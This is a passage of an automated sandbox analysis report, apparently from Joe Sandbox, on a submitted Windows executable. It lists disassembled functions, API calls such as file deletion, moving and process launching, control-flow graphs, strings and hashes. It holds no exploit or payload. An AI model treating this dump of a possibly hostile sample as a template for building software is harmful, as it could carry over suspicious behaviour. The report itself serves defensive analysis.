                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00CF3C7C,00000000), ref: 00CD0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CD0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CF3C7C,?,00000000,?,00000800), ref: 00CD0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00CF3C7C,00000800,?,00000000,?,00000800), ref: 00CD0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00CF3D44,00000800), ref: 00CD0CD8
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            • _swprintf.LIBCMT ref: 00CD0D4A
                                                            • _swprintf.LIBCMT ref: 00CD0D96
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • AllocConsole.KERNEL32 ref: 00CD0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00CD0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00CD0DAF
                                                            • _wcslen.LIBCMT ref: 00CD0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CD0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00CD0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00CD0DE7
                                                            • FreeConsole.KERNEL32 ref: 00CD0DED
                                                            • ExitProcess.KERNEL32 ref: 00CD0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                            • Instruction ID: 88fac597f94b39c890bacd6e7a90e1782c3308493ea4fed0ef081fe67e66b801
                                                            • Opcode Fuzzy Hash: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                            • Instruction Fuzzy Hash: 09D152F14183C8BBDB659F54C849BAFBBE8AF85704F50491EF38596250CBB08649CB63
                                                            Function 00CDC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 cdc73f-cdc757 call cdeb78 call cdec50 352 cdd40d-cdd418 347->352 353 cdc75d-cdc787 call cdb314 347->353 353->352 356 cdc78d-cdc792 353->356 357 cdc793-cdc7a1 356->357 358 cdc7a2-cdc7b7 call cdaf98 357->358 361 cdc7b9 358->361 362 cdc7bb-cdc7d0 call cd1fbb 361->362 365 cdc7dd-cdc7e0 362->365 366 cdc7d2-cdc7d6 362->366 367 cdd3d9-cdd404 call cdb314 365->367 368 cdc7e6 365->368 366->362 369 cdc7d8 366->369 367->357 384 cdd40a-cdd40c 367->384 370 cdc7ed-cdc7f0 368->370 371 cdca7c-cdca7e 368->371 372 cdca5f-cdca61 368->372 373 cdc9be-cdc9c0 368->373 369->367 370->367 376 cdc7f6-cdc850 call cda64d call ccbdf3 call cca544 call cca67e call cc6edb 370->376 371->367 379 cdca84-cdca8b 371->379 372->367 378 cdca67-cdca77 SetWindowTextW 372->378 373->367 375 cdc9c6-cdc9d2 373->375 381 cdc9d4-cdc9e5 call ce7686 375->381 382 cdc9e6-cdc9eb 375->382 438 cdc98f-cdc9a4 call cca5d1 376->438 378->367 379->367 380 cdca91-cdcaaa 379->380 385 cdcaac 380->385 386 cdcab2-cdcac0 call ce3e13 380->386 381->382 389 cdc9ed-cdc9f3 382->389 390 cdc9f5-cdca00 call cdb48e 382->390 384->352 385->386 386->367 401 cdcac6-cdcacf 386->401 394 cdca05-cdca07 389->394 390->394 399 cdca09-cdca10 call ce3e13 394->399 400 cdca12-cdca32 call ce3e13 call ce3e3e 394->400 399->400 421 cdca4b-cdca4d 400->421 422 cdca34-cdca3b 400->422 406 cdcaf8-cdcafb 401->406 407 cdcad1-cdcad5 401->407 412 cdcb01-cdcb04 406->412 414 cdcbe0-cdcbee call cd0602 406->414 411 cdcad7-cdcadf 407->411 407->412 411->367 417 cdcae5-cdcaf3 call cd0602 411->417 419 cdcb06-cdcb0b 412->419 420 cdcb11-cdcb2c 412->420 430 cdcbf0-cdcc04 call ce279b 414->430 417->430 419->414 419->420 433 cdcb2e-cdcb68 420->433 434 cdcb76-cdcb7d 420->434 421->367 429 cdca53-cdca5a call ce3e2e 421->429 427 cdca3d-cdca3f 422->427 428 cdca42-cdca4a call ce7686 422->428 427->428 428->421 429->367 447 cdcc06-cdcc0a 430->447 448 cdcc11-cdcc62 call cd0602 call cdb1be GetDlgItem SetWindowTextW SendMessageW call ce3e49 430->448 467 cdcb6c-cdcb6e 433->467 468 cdcb6a 433->468 440 cdcb7f-cdcb97 call ce3e13 434->440 441 cdcbab-cdcbce call ce3e13 * 2 434->441 454 cdc9aa-cdc9b9 call cca55a 438->454 455 cdc855-cdc869 SetFileAttributesW 438->455 440->441 460 cdcb99-cdcba6 call cd05da 440->460 441->430 474 cdcbd0-cdcbde call cd05da 441->474 447->448 453 cdcc0c-cdcc0e 447->453 481 cdcc67-cdcc6b 448->481 453->448 454->367 462 cdc90f-cdc91f GetFileAttributesW 455->462 463 cdc86f-cdc8a2 call ccb991 call ccb690 call ce3e13 455->463 460->441 462->438 466 cdc921-cdc930 DeleteFileW 462->466 490 cdc8b5-cdc8c3 call ccbdb4 463->490 491 cdc8a4-cdc8b3 call ce3e13 463->491 466->438 475 cdc932-cdc935 466->475 467->434 468->467 474->430 479 cdc939-cdc965 call cc4092 GetFileAttributesW 475->479 488 cdc937-cdc938 479->488 489 cdc967-cdc97d MoveFileW 479->489 481->367 485 cdcc71-cdcc85 SendMessageW 481->485 485->367 488->479 489->438 492 cdc97f-cdc989 MoveFileExW 489->492 490->454 497 cdc8c9-cdc908 call ce3e13 call cdfff0 490->497 491->490 491->497 492->438 497->462
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDC744
                                                              • Part of subcall function 00CDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CDB3FB
                                                            • _wcslen.LIBCMT ref: 00CDCA0A
                                                            • _wcslen.LIBCMT ref: 00CDCA13
                                                            • SetWindowTextW.USER32(?,?), ref: 00CDCA71
                                                            • _wcslen.LIBCMT ref: 00CDCAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 00CDCBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDCC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00CDCC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,00D0A472), ref: 00CDCC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CDCC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                            • Instruction ID: ad2e6d5ee8039148ba8fc4a5a06468c1bedcf734e20bb20036a211b9adc8f1be
                                                            • Opcode Fuzzy Hash: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                            • Instruction Fuzzy Hash: 68E160B2900259AADB25DBA4DD85EEE73BCAB04310F0040A7F719E7250EF749F85DB61
                                                            Function 00CCDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CCDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CCDAAC
                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010456), ref: 00CD1BA0
                                                            • _wcslen.LIBCMT ref: 00CCDDE9
                                                            • __fprintf_l.LIBCMT ref: 00CCDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 9491fc9e2b735270febd95306e59a5ad1e0ecc2614d0db62d6a1ad9155f1aea7
                                                            • Instruction ID: 8bef2f5362f6f36bed33b5595a108d5226be16f9609852e2329ae2571c6bf6c3
                                                            • Opcode Fuzzy Hash: 9491fc9e2b735270febd95306e59a5ad1e0ecc2614d0db62d6a1ad9155f1aea7
                                                            • Instruction Fuzzy Hash: 9132D071900258ABCF24EF68C845FEE77A5EF15300F44016EFA1697281EBB1EE85DB90
                                                            Function 00CDD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            • GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                            • Instruction ID: b104c5dd5367a065df885a9e2dbee3cc7c74aa920c3ff34c4f8f515408fc272f
                                                            • Opcode Fuzzy Hash: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                            • Instruction Fuzzy Hash: 7331E271145342BFE311DF20EC4AFAB7FACEB96704F000519F691D63A0EB688A058B76
                                                            Function 00CDD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 837 cdd78f-cdd7a7 call cdec50 840 cdd7ad-cdd7b9 call ce3e13 837->840 841 cdd9e8-cdd9f0 837->841 840->841 844 cdd7bf-cdd7e7 call cdfff0 840->844 847 cdd7e9 844->847 848 cdd7f1-cdd7ff 844->848 847->848 849 cdd801-cdd804 848->849 850 cdd812-cdd818 848->850 851 cdd808-cdd80e 849->851 852 cdd85b-cdd85e 850->852 854 cdd837-cdd844 851->854 855 cdd810 851->855 852->851 853 cdd860-cdd866 852->853 858 cdd86d-cdd86f 853->858 859 cdd868-cdd86b 853->859 856 cdd84a-cdd84e 854->856 857 cdd9c0-cdd9c2 854->857 860 cdd822-cdd82c 855->860 863 cdd854-cdd859 856->863 864 cdd9c6 856->864 857->864 865 cdd882-cdd898 call ccb92d 858->865 866 cdd871-cdd878 858->866 859->858 859->865 861 cdd82e 860->861 862 cdd81a-cdd820 860->862 861->854 862->860 869 cdd830-cdd833 862->869 863->852 870 cdd9cf 864->870 873 cdd89a-cdd8a7 call cd1fbb 865->873 874 cdd8b1-cdd8bc call cca231 865->874 866->865 867 cdd87a 866->867 867->865 869->854 872 cdd9d6-cdd9d8 870->872 876 cdd9da-cdd9dc 872->876 877 cdd9e7 872->877 873->874 882 cdd8a9 873->882 883 cdd8be-cdd8d5 call ccb6c4 874->883 884 cdd8d9-cdd8e6 ShellExecuteExW 874->884 876->877 881 cdd9de-cdd9e1 ShowWindow 876->881 877->841 881->877 882->874 883->884 884->877 886 cdd8ec-cdd8f9 884->886 888 cdd90c-cdd90e 886->888 889 cdd8fb-cdd902 886->889 891 cdd925-cdd944 call cddc3b 888->891 892 cdd910-cdd919 888->892 889->888 890 cdd904-cdd90a 889->890 890->888 893 cdd97b-cdd987 CloseHandle 890->893 891->893 906 cdd946-cdd94e 891->906 892->891 899 cdd91b-cdd923 ShowWindow 892->899 895 cdd989-cdd996 call cd1fbb 893->895 896 cdd998-cdd9a6 893->896 895->870 895->896 896->872 898 cdd9a8-cdd9aa 896->898 898->872 902 cdd9ac-cdd9b2 898->902 899->891 902->872 905 cdd9b4-cdd9be 902->905 905->872 906->893 907 cdd950-cdd961 GetExitCodeProcess 906->907 907->893 908 cdd963-cdd96d 907->908 909 cdd96f 908->909 910 cdd974 908->910 909->910 910->893
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CDD7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 00CDD8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 00CDD91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00CDD959
                                                            • CloseHandle.KERNEL32(?), ref: 00CDD97F
                                                            • ShowWindow.USER32(?,00000001), ref: 00CDD9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                            • Instruction ID: 1525631867463765d6fb796b0d1692b15002b5d3019f9c281ffe5244e3842a1b
                                                            • Opcode Fuzzy Hash: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                            • Instruction Fuzzy Hash: FE51C370808380AAD7319F64A854BBBBBE4AF41744F04041FF7D6973A1DB729B85D762
                                                            Function 00CEA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 911 cea95b-cea974 912 cea98a-cea98f 911->912 913 cea976-cea986 call ceef4c 911->913 915 cea99c-cea9c0 MultiByteToWideChar 912->915 916 cea991-cea999 912->916 913->912 921 cea988 913->921 918 cea9c6-cea9d2 915->918 919 ceab53-ceab66 call cdfbbc 915->919 916->915 922 ceaa26 918->922 923 cea9d4-cea9e5 918->923 921->912 927 ceaa28-ceaa2a 922->927 924 cea9e7-cea9f6 call cf2010 923->924 925 ceaa04-ceaa15 call ce8e06 923->925 930 ceab48 924->930 936 cea9fc-ceaa02 924->936 925->930 937 ceaa1b 925->937 927->930 931 ceaa30-ceaa43 MultiByteToWideChar 927->931 935 ceab4a-ceab51 call ceabc3 930->935 931->930 934 ceaa49-ceaa5b call ceaf6c 931->934 941 ceaa60-ceaa64 934->941 935->919 940 ceaa21-ceaa24 936->940 937->940 940->927 941->930 943 ceaa6a-ceaa71 941->943 944 ceaaab-ceaab7 943->944 945 ceaa73-ceaa78 943->945 947 ceaab9-ceaaca 944->947 948 ceab03 944->948 945->935 946 ceaa7e-ceaa80 945->946 946->930 949 ceaa86-ceaaa0 call ceaf6c 946->949 951 ceaacc-ceaadb call cf2010 947->951 952 ceaae5-ceaaf6 call ce8e06 947->952 950 ceab05-ceab07 948->950 949->935 963 ceaaa6 949->963 954 ceab09-ceab22 call ceaf6c 950->954 955 ceab41-ceab47 call ceabc3 950->955 951->955 966 ceaadd-ceaae3 951->966 952->955 967 ceaaf8 952->967 954->955 969 ceab24-ceab2b 954->969 955->930 963->930 968 ceaafe-ceab01 966->968 967->968 968->950 970 ceab2d-ceab2e 969->970 971 ceab67-ceab6d 969->971 972 ceab2f-ceab3f WideCharToMultiByte 970->972 971->972 972->955 973 ceab6f-ceab76 call ceabc3 972->973 973->935
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CE5695,00CE5695,?,?,?,00CEABAC,00000001,00000001,2DE85006), ref: 00CEA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CEAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CEAB35
                                                            • __freea.LIBCMT ref: 00CEAB42
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • __freea.LIBCMT ref: 00CEAB4B
                                                            • __freea.LIBCMT ref: 00CEAB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 17b398d0ee3a6de697a58890552133391bc65684eafd81f3ec9fb0678fa2d8ce
                                                            • Instruction ID: 394873555f12b319fb3a7ed021e714bbc15fae949e484ff91a9df56f4cc9c751
                                                            • Opcode Fuzzy Hash: 17b398d0ee3a6de697a58890552133391bc65684eafd81f3ec9fb0678fa2d8ce
                                                            • Instruction Fuzzy Hash: 1E511372600296AFDB258F66CC81FBFB7AAEB44710F154629FC14D7150EB34ED40E6A2
                                                            Function 00CE3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 976 ce3b72-ce3b7c 977 ce3bee-ce3bf1 976->977 978 ce3b7e-ce3b8c 977->978 979 ce3bf3 977->979 981 ce3b8e-ce3b91 978->981 982 ce3b95-ce3bb1 LoadLibraryExW 978->982 980 ce3bf5-ce3bf9 979->980 985 ce3c09-ce3c0b 981->985 986 ce3b93 981->986 983 ce3bfa-ce3c00 982->983 984 ce3bb3-ce3bbc GetLastError 982->984 983->985 989 ce3c02-ce3c03 FreeLibrary 983->989 987 ce3bbe-ce3bd3 call ce6088 984->987 988 ce3be6-ce3be9 984->988 985->980 990 ce3beb 986->990 987->988 993 ce3bd5-ce3be4 LoadLibraryExW 987->993 988->990 989->985 990->977 993->983 993->988
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE3C35,?,?,00D22088,00000000,?,00CE3D60,00000004,InitializeCriticalSectionEx,00CF6394,InitializeCriticalSectionEx,00000000), ref: 00CE3C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: 7a92d0a14e427bf5018975824f0e475e806983e02cc20b8df6c9f4aa54888dd6
                                                            • Instruction ID: 46a680e3441b0d8576348b3d588e429533b6d074818922ee032e357d82fbd051
                                                            • Opcode Fuzzy Hash: 7a92d0a14e427bf5018975824f0e475e806983e02cc20b8df6c9f4aa54888dd6
                                                            • Instruction Fuzzy Hash: 3F11A731A452E5ABCB218B6A9C49B6E37649F01770F250211E926EB2D0D775FF00C6D2
                                                            Function 00CDAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            • OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                            • SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
